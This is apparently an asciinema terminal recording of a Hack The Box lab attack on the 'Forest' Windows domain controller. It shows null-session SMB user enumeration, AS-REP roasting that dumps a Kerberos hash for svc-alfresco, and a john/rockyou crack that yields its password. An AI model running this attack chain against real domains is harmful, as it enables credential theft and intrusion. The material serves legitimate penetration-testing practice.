{"version":3,"term":{"cols":160,"rows":48,"type":"xterm-256color","theme":{"fg":"#cccccc","bg":"#141d2b","palette":"#141d2b:#ff3e3e:#6fa700:#b57c00:#0086ff:#9f00ff:#00d49c:#a4b1cd:#181f2b:#ff5d5d:#9fef00:#ffaf00:#2c9bff:#ac23ff:#2ee7b6:#b5bfd5"}},"timestamp":1760659084,"idle_time_limit":2.0,"env":{"SHELL":"/bin/bash"}}
[0.509799, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000075, "o", "\u001b[0m"]
[0.037512, "o", "\u001b[0m"]
[0.00178, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000118, "o", "\u001b[0m"]
[0.045503, "o", "\u001b[0m"]
[0.000058, "o", "\u001b[0m\u001b[0m"]
[0.002144, "o", "\u001b[0m"]
[0.004948, "o", "\u001b[0m\u001b[0m"]
[0.000394, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000045, "o", "\u001b[0m\u001b[0m"]
[0.002591, "o", "\u001b[0m"]
[0.001158, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000082, "o", "\u001b[0m\u001b[0m"]
[0.000121, "o", "\u001b[0m\u001b[0m"]
[0.000042, "o", "\u001b[0m\u001b[0m"]
[0.00004, "o", "\u001b[0m\u001b[0m"]
[0.000208, "o", "\u001b[0m\u001b[0m"]
[0.000012, "o", "\u001b[0m"]
[0.00001, "o", "\u001b[0m"]
[0.000037, "o", "\u001b[0m"]
[0.000018, "o", "\u001b[0m"]
[0.000013, "o", "\u001b[0m"]
[0.000021, "o", "\u001b[0m"]
[0.00004, "o", "\u001b[0m\u001b[0m"]
[0.000018, "o", "\u001b[0m"]
[0.000123, "o", "\u001b[0m"]
[0.00001, "o", "\u001b[0m"]
[0.000281, "o", "\u001b[0m"]
[0.00002, "o", "\u001b[0m"]
[0.000006, "o", "\u001b[0m"]
[0.000083, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000065, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000008, "o", "\u001b[0m"]
[0.00003, "o", "\u001b[0m"]
[0.00004, "o", "\u001b[0m\u001b[0m"]
[0.000026, "o", "\u001b[0m"]
[0.000004, "o", "\u001b[0m"]
[0.000056, "o", "\u001b[0m\u001b[0m"]
[0.000012, "o", "\u001b[0m\u001b[0m"]
[0.000036, "o", "\u001b[0m\u001b[0m\u001b[0m"]
[0.000042, "o", "\u001b[0m"]
[0.000027, "o", "\u001b[0m\u001b[0m"]
[0.000027, "o", "\u001b[0m"]
[0.000018, "o", "\u001b[0m\u001b[0m"]
[0.000069, "o", "\u001b[0m\u001b[0m\u001b[0m\u001b[0m"]
[0.000038, "o", "\u001b[0m\u001b[0m"]
[0.000038, "o", "\u001b[0m"]
[0.000006, "o", "\u001b[0m"]
[0.000061, "o", "\u001b[0m"]
[0.000738, "o", "\u001b[0m"]
[0.014419, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[0.805386, "o", "n"]
[0.177634, "o", "e"]
[0.203926, "o", "t"]
[0.186067, "o", "e"]
[0.226716, "o", "x"]
[0.204119, "o", "e"]
[0.214357, "o", "c"]
[0.148323, "o", " "]
[0.929254, "o", "s"]
[0.121049, "o", "m"]
[0.507931, "o", "b"]
[0.209167, "o", " "]
[0.205695, "o", "1"]
[0.241862, "o", "0"]
[0.20263, "o", "."]
[0.095264, "o", "1"]
[0.211519, "o", "2"]
[0.250545, "o", "9"]
[0.350146, "o", "."]
[0.593189, "o", "2"]
[0.505102, "o", "4"]
[0.128628, "o", "."]
[0.184741, "o", "1"]
[0.29034, "o", "9"]
[0.03616, "o", "0"]
[0.534497, "o", " "]
[0.718682, "o", "-"]
[0.227212, "o", "u"]
[0.102892, "o", " "]
[0.307718, "o", "'"]
[0.142681, "o", "'"]
[0.120463, "o", " "]
[0.224264, "o", "-"]
[0.216259, "o", "p"]
[0.135508, "o", " "]
[0.240691, "o", "'"]
[0.164404, "o", "'"]
[0.573793, "o", "\r\n\u001b[?2004l\r"]
[0.012194, "o", "\u001b[0m"]
[0.597563, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;34m[*]\u001b[0m Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (\u001b[1;32msigning:True\u001b[0m) (\u001b[1;33mSMBv1:True\u001b[0m)\r\n"]
[0.019915, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;32m[+]\u001b[0m htb.local\\: \r\n"]
[0.12933, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[1.04595, "o", "n"]
[0.164936, "o", "e"]
[0.226244, "o", "t"]
[0.644087, "o", "e"]
[0.297621, "o", "x"]
[0.308111, "o", "e"]
[0.249897, "o", "c"]
[0.132119, "o", " "]
[0.319792, "o", "s"]
[0.265631, "o", "m"]
[0.188568, "o", "b"]
[0.137739, "o", " "]
[0.41489, "o", "1"]
[0.384431, "o", "0"]
[0.180294, "o", "."]
[0.143193, "o", "1"]
[0.20859, "o", "2"]
[0.249861, "o", "9"]
[0.254424, "o", "."]
[0.883972, "o", "2"]
[0.276615, "o", "4"]
[0.146575, "o", "."]
[0.21573, "o", "1"]
[0.597904, "o", "9"]
[0.034493, "o", "0"]
[0.194423, "o", " "]
[0.59897, "o", "-"]
[0.372803, "o", "u"]
[0.099125, "o", " "]
[0.455562, "o", "'"]
[0.207715, "o", "'"]
[0.122178, "o", " "]
[0.348008, "o", "-"]
[0.356698, "o", "p"]
[0.168222, "o", " "]
[0.263523, "o", "'"]
[0.679806, "o", "'"]
[0.111192, "o", " "]
[1.096063, "o", "-"]
[0.14257, "o", "-"]
[0.142846, "o", "s"]
[0.181365, "o", "h"]
[0.68949, "o", "a"]
[0.509273, "o", "r"]
[0.051574, "o", "e"]
[0.441854, "o", "s"]
[0.473035, "o", "\r\n\u001b[?2004l\r"]
[0.01325, "o", "\u001b[0m"]
[0.6151, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;34m[*]\u001b[0m Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (\u001b[1;32msigning:True\u001b[0m) (\u001b[1;33mSMBv1:True\u001b[0m)\r\n"]
[0.020064, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;32m[+]\u001b[0m htb.local\\: \r\n"]
[0.005611, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;35m[-]\u001b[0m Error enumerating shares: STATUS_ACCESS_DENIED\r\n"]
[0.121715, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[1.011078, "o", "n"]
[0.14346, "o", "e"]
[0.202811, "o", "t"]
[0.139835, "o", "s"]
[0.547342, "o", "\b\u001b[K"]
[0.143572, "o", "e"]
[0.218977, "o", "x"]
[0.236683, "o", "e"]
[0.227783, "o", "c"]
[0.09785, "o", " "]
[0.486718, "o", "s"]
[0.171547, "o", "m"]
[0.23099, "o", "b"]
[0.189461, "o", " "]
[0.415557, "o", "1"]
[0.249037, "o", "0"]
[0.17148, "o", "."]
[0.13184, "o", "1"]
[0.263208, "o", "2"]
[0.533393, "o", "9"]
[0.45306, "o", "."]
[0.7463, "o", "2"]
[0.288563, "o", "4"]
[0.128405, "o", "."]
[0.196873, "o", "1"]
[0.164676, "o", "9"]
[0.045165, "o", "0"]
[0.111767, "o", " "]
[0.691332, "o", "-"]
[0.246039, "o", "u"]
[0.096387, "o", " "]
[0.753903, "o", "'"]
[0.14871, "o", "'"]
[0.104063, "o", " "]
[0.24712, "o", "-"]
[0.264372, "o", "p"]
[0.334407, "o", " "]
[0.322585, "o", "'"]
[0.131122, "o", "'"]
[0.161909, "o", " "]
[0.52543, "o", "-"]
[0.225577, "o", "-"]
[0.117757, "o", "r"]
[0.243035, "o", "i"]
[0.147042, "o", "d"]
[0.264428, "o", "-"]
[0.488379, "o", "b"]
[0.357661, "o", "r"]
[0.510902, "o", "u"]
[0.248815, "o", "t"]
[0.076954, "o", "e"]
[0.88852, "o", "\r\n\u001b[?2004l\r"]
[0.012263, "o", "\u001b[0m"]
[0.597669, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;34m[*]\u001b[0m Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (\u001b[1;32msigning:True\u001b[0m) (\u001b[1;33mSMBv1:True\u001b[0m)\r\n"]
[0.022744, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;32m[+]\u001b[0m htb.local\\: \r\n"]
[0.028993, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;31m[-]\u001b[0m Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.\r\n"]
[0.141984, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[2.04018, "o", "n"]
[0.150575, "o", "e"]
[0.165562, "o", "t"]
[0.465186, "o", "e"]
[0.245882, "o", "x"]
[0.255801, "o", "e"]
[0.217612, "o", "c"]
[0.151776, "o", " "]
[0.493514, "o", "s"]
[0.164789, "o", "m"]
[0.722768, "o", "b"]
[0.626473, "o", " "]
[0.621026, "o", "1"]
[0.188189, "o", "0"]
[0.195032, "o", "."]
[0.203506, "o", "1"]
[0.273996, "o", "2"]
[0.587914, "o", "9"]
[0.354355, "o", "."]
[0.657478, "o", "2"]
[0.354668, "o", "4"]
[0.162161, "o", "."]
[0.465186, "o", "1"]
[0.255076, "o", "9"]
[0.029541, "o", "0"]
[0.141022, "o", " "]
[0.785784, "o", "-"]
[0.380611, "o", "u"]
[0.117577, "o", " "]
[0.339988, "o", "'"]
[0.126087, "o", "'"]
[0.177181, "o", " "]
[0.363024, "o", "-"]
[0.283908, "o", "p"]
[0.17305, "o", " "]
[0.286903, "o", "'"]
[0.15916, "o", "'"]
[0.274519, "o", " "]
[1.000018, "o", "-"]
[0.154168, "o", "-"]
[0.633818, "o", "u"]
[0.080187, "o", "s"]
[0.317248, "o", "e"]
[0.006953, "o", "r"]
[0.246584, "o", "s"]
[0.811233, "o", "\r\n\u001b[?2004l\r"]
[0.011122, "o", "\u001b[0m"]
[1.920516, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;34m[*]\u001b[0m Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (\u001b[1;32msigning:True\u001b[0m) (\u001b[1;33mSMBv1:True\u001b[0m)\r\n"]
[0.019957, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;32m[+]\u001b[0m htb.local\\: \r\n"]
[0.610701, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33m-Username-                    -Last PW Set-       -BadPW- -Description-                                     \u001b[0m\r\n"]
[0.000197, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mAdministrator                 2021-08-31 00:51:58 0       Built-in account for administering the computer/domain\u001b[0m\r\n"]
[0.000164, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mGuest                         <never>             0       Built-in account for guest access to the computer/domain\u001b[0m\r\n"]
[0.000146, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mkrbtgt                        2019-09-18 10:53:23 0       Key Distribution Center Service Account \u001b[0m\r\n"]
[0.000198, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mDefaultAccount                <never>             0       A user account managed by the system. \u001b[0m\r\n"]
[0.000152, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33m$331000-VK4ADACQNUCA          <never>             0        \u001b[0m\r\n"]
[0.000152, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_2c8eef0a09b545acb          <never>             0        \u001b[0m\r\n"]
[0.000156, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_ca8c2ed5bdab4dc9b          <never>             0        \u001b[0m\r\n"]
[0.000136, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_75a538d3025e4db9a          <never>             0        \u001b[0m\r\n"]
[0.000142, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_681f53d4942840e18          <never>             0        \u001b[0m\r\n"]
[0.000147, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_1b41c9286325456bb          <never>             0        \u001b[0m\r\n"]
[0.000137, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_9b69f1b9d2cc45549          <never>             0        \u001b[0m\r\n"]
[0.00014, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_7c96b981967141ebb          <never>             0        \u001b[0m\r\n"]
[0.000139, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_c75ee099d0a64c91b          <never>             0        \u001b[0m\r\n"]
[0.000166, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mSM_1ffab36a2f5f479cb          <never>             0        \u001b[0m\r\n"]
[0.000151, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailboxc3d7722          2019-09-23 22:51:31 0        \u001b[0m\r\n"]
[0.000145, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailboxfc9daad          2019-09-23 22:51:35 0        \u001b[0m\r\n"]
[0.00014, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailboxc0a90c9          2019-09-19 11:56:35 0        \u001b[0m\r\n"]
[0.000139, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailbox670628e          2019-09-19 11:56:45 0        \u001b[0m\r\n"]
[0.000139, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailbox968e74d          2019-09-19 11:56:56 0        \u001b[0m\r\n"]
[0.000139, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailbox6ded678          2019-09-19 11:57:06 0        \u001b[0m\r\n"]
[0.000136, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailbox83d6781          2019-09-19 11:57:17 0        \u001b[0m\r\n"]
[0.000138, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailboxfd87238          2019-09-19 11:57:27 0        \u001b[0m\r\n"]
[0.00014, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailboxb01ac64          2019-09-19 11:57:37 0        \u001b[0m\r\n"]
[0.000137, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailbox7108a4e          2019-09-19 11:57:48 0        \u001b[0m\r\n"]
[0.000137, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mHealthMailbox0659cc1          2019-09-19 11:57:58 0        \u001b[0m\r\n"]
[0.000136, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33msebastien                     2019-09-20 00:29:59 0        \u001b[0m\r\n"]
[0.000143, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mlucinda                       2019-09-20 00:44:13 0        \u001b[0m\r\n"]
[0.00019, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33msvc-alfresco                  2025-10-17 00:05:36 0        \u001b[0m\r\n"]
[0.000162, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mandy                          2019-09-22 22:44:16 0        \u001b[0m\r\n"]
[0.000172, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33mmark                          2019-09-20 22:57:30 0        \u001b[0m\r\n"]
[0.000178, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;33msanti                         2019-09-20 23:02:55 0        \u001b[0m\r\n"]
[0.130646, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[1.728014, "o", "c"]
[0.000472, "o", "a"]
[0.069708, "o", "t"]
[0.128832, "o", " "]
[0.682363, "o", "u"]
[0.15814, "o", "s"]
[0.466281, "o", "e"]
[0.237738, "o", "r"]
[0.272899, "o", "s"]
[0.628479, "o", "."]
[0.34528, "o", "t"]
[0.08189, "o", "x"]
[0.096205, "o", "t"]
[0.783453, "o", "\r\n\u001b[?2004l\r"]
[0.013059, "o", "\u001b[0m"]
[0.001005, "o", "Administrator\r\nGuest\r\nkrbtgt\r\nDefaultAccount\r\n$331000-VK4ADACQNUCA\r\nSM_2c8eef0a09b545acb\r\nSM_ca8c2ed5bdab4dc9b\r\nSM_75a538d3025e4db9a\r\nSM_681f53d4942840e18\r\nSM_1b41c9286325456bb\r\nSM_9b69f1b9d2cc45549\r\nSM_7c96b981967141ebb\r\nSM_c75ee099d0a64c91b\r\nSM_1ffab36a2f5f479cb\r\nHealthMailboxc3d7722\r\nHealthMailboxfc9daad\r\nHealthMailboxc0a90c9\r\nHealthMailbox670628e\r\nHealthMailbox968e74d\r\nHealthMailbox6ded678\r\nHealthMailbox83d6781\r\nHealthMailboxfd87238\r\nHealthMailboxb01ac64\r\nHealthMailbox7108a4e\r\nHealthMailbox0659cc1\r\nsebastien\r\nlucinda\r\nsvc-alfresco\r\nandy\r\nmark\r\nsanti\r\n"]
[0.014967, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[1.965298, "o", "n"]
[0.201368, "o", "e"]
[0.223554, "o", "t"]
[0.37147, "o", "e"]
[0.266284, "o", "x"]
[0.271716, "o", "e"]
[0.253957, "o", "c"]
[0.210338, "o", " "]
[2.730165, "o", "l"]
[0.066562, "o", "d"]
[0.074258, "o", "a"]
[0.092089, "o", "p"]
[0.111514, "o", " "]
[1.269233, "o", "1"]
[0.277579, "o", "0"]
[0.195468, "o", "."]
[0.11005, "o", "1"]
[0.213387, "o", "2"]
[0.296778, "o", "9"]
[0.872056, "o", "."]
[0.301747, "o", "2"]
[0.251548, "o", "4"]
[0.987862, "o", "."]
[0.257708, "o", "1"]
[0.166472, "o", "9"]
[0.044876, "o", "0"]
[0.184571, "o", " "]
[0.865102, "o", "-"]
[0.758167, "o", "u"]
[0.202767, "o", " "]
[0.289723, "o", "u"]
[0.119173, "o", "s"]
[0.209725, "o", "e"]
[0.240899, "o", "r"]
[0.249736, "o", "s"]
[1.370875, "o", ","]
[0.600137, "o", "\b\u001b[K"]
[0.231426, "o", "."]
[0.683548, "o", "t"]
[0.084012, "o", "x"]
[0.104641, "o", "t"]
[0.449565, "o", " "]
[0.781006, "o", "-"]
[0.216748, "o", "p"]
[0.165795, "o", " "]
[0.642093, "o", "'"]
[0.204648, "o", " "]
[0.886028, "o", "\b\u001b[K"]
[0.658684, "o", "'"]
[0.322414, "o", " "]
[1.185565, "o", "-"]
[0.204021, "o", "-"]
[0.326603, "o", "a"]
[0.204613, "o", "s"]
[0.396094, "o", "r"]
[0.051675, "o", "e"]
[0.28614, "o", "p"]
[0.317175, "o", "r"]
[0.140241, "o", "o"]
[0.269707, "o", "a"]
[0.069834, "o", "s"]
[0.354644, "o", "t"]
[1.006914, "o", " "]
[3.235589, "o", "h"]
[0.057574, "o", "a"]
[0.090275, "o", "s"]
[0.089311, "o", "h"]
[1.061525, "o", "\r\n\u001b[?2004l\r"]
[0.013714, "o", "\u001b[0m"]
[1.147416, "o", "\u001b[1;34mSMB\u001b[0m         10.129.24.190   445    FOREST           \u001b[1;34m[*]\u001b[0m Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (\u001b[1;32msigning:True\u001b[0m) (\u001b[1;33mSMBv1:True\u001b[0m)\r\n"]
[0.012615, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.004936, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.004826, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.006688, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.00798, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.005535, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.007226, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.004783, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.005252, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.006438, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.005332, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.005715, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.005105, "o", "\u001b[1;31m[-]\u001b[0m Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)\r\n"]
[0.073845, "o", "\u001b[1;34mLDAP\u001b[0m        10.129.24.190   445    FOREST           \u001b[1;33m$krb5asrep$23$svc-alfresco@HTB.LOCAL:823be94f9cddcc01201c11c704e4a13d$d970e82cfe761ae3fe54e4dc2bd26adbbae5086543dffc6af7f7ba211d02c670c51b72472f922ee98496d72883e7579c99e739aa4396a131cef96a5aeff2e8db7fd74c873f02a578c230ec44174930815dc08d5d853f9581590b9fde9955a7ae2983e9507b4cc9c64c8a448a14d248f38abebcbb4f42f35e30284aa55eedddbc10238dabd4fe9e64f309e3d85816f5159819a09a9b735e17c4063947243fb9d923029c33628ae17757c80661d53a0cc6a0ae251d28e22e2c04267c27b005734e47c97056a8d32e16f37fac2a12dd314056d03d7984b9fa7c58c5fb0b9195a62ba873e4eb43d9\u001b[0m\r\n"]
[0.120185, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[1.463827, "o", "c"]
[0.050996, "o", "a"]
[0.112639, "o", "t"]
[0.101993, "o", " "]
[0.631225, "o", "h"]
[0.083839, "o", "a"]
[0.061099, "o", "s"]
[0.113012, "o", "h"]
[0.681415, "o", "\r\n\u001b[?2004l\r"]
[0.012298, "o", "\u001b[0m"]
[0.000937, "o", "$krb5asrep$23$svc-alfresco@HTB.LOCAL:823be94f9cddcc01201c11c704e4a13d$d970e82cfe761ae3fe54e4dc2bd26adbbae5086543dffc6af7f7ba211d02c670c51b72472f922ee98496d72883e7579c99e739aa4396a131cef96a5aeff2e8db7fd74c873f02a578c230ec44174930815dc08d5d853f9581590b9fde9955a7ae2983e9507b4cc9c64c8a448a14d248f38abebcbb4f42f35e30284aa55eedddbc10238dabd4fe9e64f309e3d85816f5159819a09a9b735e17c4063947243fb9d923029c33628ae17757c80661d53a0cc6a0ae251d28e22e2c04267c27b005734e47c97056a8d32e16f37fac2a12dd314056d03d7984b9fa7c58c5fb0b9195a62ba873e4eb43d9\r\n"]
[0.014975, "o", "\u001b[?2004h\u001b[1;32m┌─[\u001b[1;34msg-dedivip-1\u001b[1;32m]─[\u001b[1;37m10.10.14.107\u001b[1;32m]─[\u001b[1;37mlambermaybe\u001b[01;32m@\u001b[01;34mhtb-fiabh8rq5n\u001b[1;32m]─[\u001b[1;37m~\u001b[1;32m]\r\r\n\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32m"]
[2.818514, "o", "j"]
[0.061415, "o", "o"]
[0.820583, "o", "h"]
[0.232175, "o", "n"]
[0.125678, "o", " "]
[0.377783, "o", "h"]
[0.12379, "o", "a"]
[0.063667, "o", "s"]
[0.111774, "o", "h"]
[0.306814, "o", " "]
[0.456942, "o", "-"]
[0.134398, "o", "-"]
[0.25717, "o", "w"]
[0.207247, "o", "o"]
[0.190487, "o", "r"]
[0.199017, "o", "d"]
[0.159387, "o", "l"]
[0.24765, "o", "i"]
[0.073441, "o", "s"]
[0.91249, "o", "t"]
[0.602637, "o", "="]
[0.347636, "o", "/"]
[1.603152, "o", "u"]
[0.097789, "o", "s"]
[0.322565, "o", "e"]
[1.798138, "o", "\b\u001b[K"]
[0.127243, "o", "\r\u001b[1;32m└──╼ [\u001b[01;33m★\u001b[01;32m]$ \u001b[0m\u001b[1;32mjohn hash --wordlist=/usr/"]
[0.882725, "o", "s"]
[0.165897, "o", "h"]
[0.061797, "o", "a"]
[0.310629, "o", "r"]
[0.248681, "o", "e"]
[0.678764, "o", "/"]
[0.240845, "o", "w"]
[0.226069, "o", "o"]
[0.207812, "o", "r"]
[0.337543, "o", "dlists/"]
[1.148629, "o", "r"]
[0.0996, "o", "o"]
[0.207127, "o", "c"]
[0.154069, "o", "kyou.txt "]
[1.759556, "o", "\r\n\u001b[?2004l\r"]
[0.013036, "o", "\u001b[0m"]
[0.03834, "o", "Using default input encoding: UTF-8\r\n"]
[0.000018, "o", "Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])\r\n"]
[0.000406, "o", "Will run 4 OpenMP threads\r\n"]
[0.088737, "o", "Press 'q' or Ctrl-C to abort, almost any other key for status\r\n"]
[2.873822, "o", "\u001b[0;33ms3rvice\u001b[0m          (\u001b[0;33m$krb5asrep$23$svc-alfresco@HTB.LOCAL\u001b[0m\u001b[0m)     \r\n"]
[0.003592, "o", "1g 0:00:00:02 DONE (2025-10-16 19:00) 0.3460g/s 1413Kp/s 1413Kc/s 1413KC/s s4553592..s3r2s1"]
